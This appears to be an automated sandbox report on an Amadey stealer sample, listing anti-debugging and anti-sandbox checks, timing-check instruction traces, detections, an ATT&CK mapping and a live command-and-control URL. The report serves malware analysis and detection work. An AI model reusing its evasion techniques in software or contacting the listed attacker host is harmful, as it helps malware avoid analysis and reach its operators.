Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5140969 second address: 51409F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4FE9502C5Fh 0x00000013 xor cl, FFFFFFEEh 0x00000016 jmp 00007F4FE9502C69h 0x0000001b popfd 0x0000001c push esi 0x0000001d push edi 0x0000001e pop esi 0x0000001f pop ebx 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop eax 0x00000027 pushfd 0x00000028 jmp 00007F4FE9502C67h 0x0000002d and ax, 9BAEh 0x00000032 jmp 00007F4FE9502C69h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51409F4 second address: 5140A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4FE915D6AEh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4FE915D6B7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130F46 second address: 5130F4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130F4C second address: 5130F69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130F69 second address: 5130F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130F6D second address: 5130F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130F71 second address: 5130F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0EBE second address: 50D0ECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514020B second address: 5140211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5140211 second address: 5140217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5140217 second address: 514023C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FE9502C67h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514023C second address: 5140242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5140242 second address: 514026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F4FE9502C64h 0x00000016 mov cx, 24C1h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514026C second address: 5140272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51402E1 second address: 51402E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F03D9 second address: 50F03EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6AFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F03EC second address: 50F0402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4FE9502C5Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0402 second address: 50F042B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f call 00007F4FE915D6B9h 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F042B second address: 50F0489 instructions: 0x00000000 rdtsc 0x00000002 mov dh, CAh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4FE9502C5Ah 0x0000000c add ah, 00000028h 0x0000000f jmp 00007F4FE9502C5Bh 0x00000014 popfd 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F4FE9502C66h 0x0000001d push FFFFFFFEh 0x0000001f jmp 00007F4FE9502C60h 0x00000024 push 1EAD3E03h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F4FE9502C5Ch 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0489 second address: 50F04FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F4FE915D6B7h 0x0000000b sub cl, 0000002Eh 0x0000000e jmp 00007F4FE915D6B9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor dword ptr [esp], 69ECFE1Bh 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F4FE915D6B3h 0x00000026 call 00007F4FE915D6B8h 0x0000002b pop ecx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F04FD second address: 50F0552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 pushfd 0x00000006 jmp 00007F4FE9502C5Ah 0x0000000b add esi, 1471A538h 0x00000011 jmp 00007F4FE9502C5Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a call 00007F4FE9502C59h 0x0000001f jmp 00007F4FE9502C66h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4FE9502C5Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0552 second address: 50F058E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F4FE915D6B9h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4FE915D6ACh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F06C6 second address: 50F0711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4FE9502C5Eh 0x00000015 xor esi, 43E808E8h 0x0000001b jmp 00007F4FE9502C5Bh 0x00000020 popfd 0x00000021 mov eax, 7F9E58DFh 0x00000026 popad 0x00000027 mov eax, 4539A3FBh 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4FE9502C5Ch 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0711 second address: 50F0717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0717 second address: 50F0744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a mov cx, bx 0x0000000d movsx edx, ax 0x00000010 popad 0x00000011 mov eax, dword ptr [7743B370h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F4FE9502C5Fh 0x0000001e mov si, 7C9Fh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0744 second address: 50F0777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [ebp-08h], eax 0x0000000b jmp 00007F4FE915D6B8h 0x00000010 xor eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4FE915D6ACh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0777 second address: 50F0810 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b call 00007F4FE9502C64h 0x00000010 mov dx, si 0x00000013 pop eax 0x00000014 pushfd 0x00000015 jmp 00007F4FE9502C67h 0x0000001a sub si, 730Eh 0x0000001f jmp 00007F4FE9502C69h 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007F4FE9502C61h 0x0000002c nop 0x0000002d jmp 00007F4FE9502C5Eh 0x00000032 lea eax, dword ptr [ebp-10h] 0x00000035 pushad 0x00000036 mov dx, si 0x00000039 popad 0x0000003a mov dword ptr fs:[00000000h], eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 movsx edi, cx 0x00000046 mov edi, eax 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0810 second address: 50F0826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE915D6B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F0826 second address: 50F082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50F082A second address: 50F0850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov dx, si 0x0000000f popad 0x00000010 mov eax, dword ptr [esi+10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4FE915D6B1h 0x0000001a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DDEBE9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F856AD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F8B954 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1004D58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 28EBE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 4356AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 43B954 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 4B4D58 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_051401BA rdtsc

0_2_051401BA

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1346	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 418	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 988	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1332	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1363	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 796	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 796	Thread sleep time: -70035s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3192	Thread sleep count: 1346 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3192	Thread sleep time: -2693346s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1336	Thread sleep count: 418 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1336	Thread sleep time: -12540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3556	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5660	Thread sleep count: 988 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5660	Thread sleep time: -1976988s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6596	Thread sleep count: 1332 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6596	Thread sleep time: -2665332s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4816	Thread sleep count: 1363 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4816	Thread sleep time: -2727363s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: axplong.exe, axplong.exe, 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2262607837.0000000000F68000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2288291827.0000000000418000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_051401BA rdtsc

0_2_051401BA

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 5_2_0025645B mov eax, dword ptr fs:[00000030h]		5_2_0025645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 5_2_0025A1C2 mov eax, dword ptr fs:[00000030h]		5_2_0025A1C2

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"

Jump to behavior

Source: axplong.exe, axplong.exe, 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 5_2_0023D312 cpuid

5_2_0023D312

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 5_2_0023CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

5_2_0023CB1A

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 5_2_002265B0 LookupAccountNameA,

5_2_002265B0

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 5.2.axplong.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2288200287.0000000000221000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2247936497.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2262535378.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2769975367.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2219847128.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	641 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	224 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://185.215.113.16/Jo89Ku7d/index.phpQi	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpoh	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phph	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpL	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpd	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpsK	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpPh	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php	100%	Avira URL Cloud	malware
http://185.215.113.16/Jo89Ku7d/index.php3i	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php8	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php2h	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php4	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpBi	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpded	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpiP	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php#h	100%	Avira URL Cloud	malware
http://185.215.113.16/Jo89Ku7d/index.phpncoded	100%	Avira URL Cloud	phishing

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.phpL	axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phph	axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpoh	axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpPh	axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpQi	axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpsK	axplong.exe, 00000005.00000002.3453927497.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
